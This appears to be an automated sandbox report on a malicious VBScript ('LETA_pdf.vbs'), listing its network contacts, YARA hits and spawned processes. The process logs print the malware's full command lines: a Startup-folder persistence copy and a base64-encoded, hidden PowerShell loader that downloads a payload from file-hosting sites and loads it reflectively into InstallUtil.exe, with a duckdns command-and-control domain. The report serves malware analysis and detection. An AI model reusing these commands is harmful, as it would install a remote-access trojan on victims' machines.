                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /d/0jfAN HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /zj1o07.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /d/0jfAN HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                        Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                        Source: global trafficDNS traffic detected: DNS query: deadpoolstart2025.duckdns.org
                        Source: InstallUtil.exe, 0000000D.00000002.3451747928.0000000005408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: InstallUtil.exe, 0000000D.00000002.3451605765.0000000005400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabd
                        Source: wscript.exe, 00000000.00000003.2302592434.0000023843C89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305642751.0000023841FBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180833243.0000023843C87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2303965134.0000023843F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2304522122.0000023841FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0jfAN
                        Source: wscript.exe, 00000000.00000003.2303716053.0000023841D6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305294685.0000023841D83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2304423906.0000023841D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0jfANl6r.dll
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.2292182523.000002415415D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF28D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2568313693.000002CA49891000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                        Source: powershell.exe, 00000009.00000002.2566881989.000002CA478A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/f
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                        Source: powershell.exe, 00000005.00000002.2292182523.00000241540DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 00000005.00000002.2292182523.000002415412C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF2CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF28D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2568313693.000002CA49891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                        Source: powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000005.00000002.2294778196.000002416C1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                        Source: wscript.exe, 00000000.00000003.2299241877.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298792949.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2302151095.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305487837.0000023841DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/#
                        Source: wscript.exe, 00000000.00000003.2299241877.0000023841DFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305564366.0000023841DFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2299241877.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298344275.0000023841DFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298792949.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2302151095.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305487837.0000023841DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/0jfAN
                        Source: wscript.exe, 00000000.00000003.2299241877.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298792949.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2302151095.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305487837.0000023841DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/0jfAN
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.6:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49785 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: Process Memory Space: powershell.exe PID: 5100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 3960, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348038F25_2_00007FFD348038F2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348016F25_2_00007FFD348016F2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348027FA5_2_00007FFD348027FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_013876C813_2_013876C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_01386DF813_2_01386DF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0138344813_2_01383448
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0138344313_2_01383443
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_01386AB013_2_01386AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0138BCB313_2_0138BCB3
                        Source: LETA_pdf.vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358Jump to behavior
                        Source: Process Memory Space: powershell.exe PID: 5100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 3960, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@15/8@4/5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\cookies
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4w2ic4xt.eg2.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE